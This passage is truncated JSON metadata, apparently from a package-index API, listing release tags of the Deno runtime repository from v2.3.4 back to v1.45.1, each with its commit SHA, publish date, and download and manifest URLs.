tml_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denola